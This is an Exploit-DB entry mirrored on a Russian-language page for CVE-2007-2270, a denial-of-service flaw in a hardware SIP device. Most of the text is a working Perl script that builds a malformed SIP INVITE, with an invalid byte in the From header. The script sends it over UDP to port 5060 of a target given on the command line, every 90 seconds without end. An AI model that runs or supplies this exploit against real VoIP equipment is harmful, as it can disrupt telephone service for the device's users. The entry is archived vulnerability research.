- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3792
- Проверка EDB
-
- Пройдено
- Автор
- MADYNES
- Тип уязвимости
- DOS
- Платформа
- HARDWARE
- CVE
- cve-2007-2270
- Дата публикации
- 2007-04-24
Код:
#!/usr/bin/perl
use IO::Socket;
#die "Usage $0 <username> <dst_IP> <Source_IP> <SourcePort>" unless ($ARGV[2]);
die "Usage $0 <username> <dst_IP> <SourceIp> <sourceport>" unless ($ARGV[0]);
my $sock = new IO::Socket::INET( LocalHost => $ARGV[2], LocalPort => $ARGV[3], Proto => 'udp');
$socket=new IO::Socket::INET->new(PeerAddr=>$ARGV[1], PeerPort=> '5060', Proto=>'udp', LocalAddr=>$ARGV[2], LocalPort=>'5061');
$touser=$ARGV[0];
$target=$ARGV[1];
$sourceaddress=$ARGV[2];
$sourceport=$ARGV[3];
$high=2000;
$low=1;
$fromuserid = int(rand( $high-$low+1 ) ) + $low;
my $cseq = "INVITE";
$msg = "INVITE sip:$touser\@$target SIP/2.0\r
Via: SIP/2.0/UDP $sourceaddress:$sourceport;branch=z9hG4bK00000\r
From: \377<sip:$fromuserid\@$sourceaddress>;tag=779\r
To: Receiver <sip:$touser\@$target>\r
Call-ID: 10\@$sourceaddress\r
CSeq: 1 $cseq\r
Contact: 779 <sip:$fromuserid\@$sourceaddress>\r
Expires: 1200\r
Max-Forwards: 70\r
Content-Type: application/sdp\r
Content-Length: 133\r
\r
v=0\r
o=0 0 0 IN IP4 $sourceaddress\r
s=Session SDP\r
c=IN IP4 $sourceaddress\r
t=0 0\r
m=audio 9876 RTP/AVP 0\r
a=rtpmap:0 PCMU/8000\r";
$sock or die "no socket :$!";
while (1){
$socket->send($msg);
sleep 90;
}
# milw0rm.com [2007-04-24]
- Источник
- www.exploit-db.com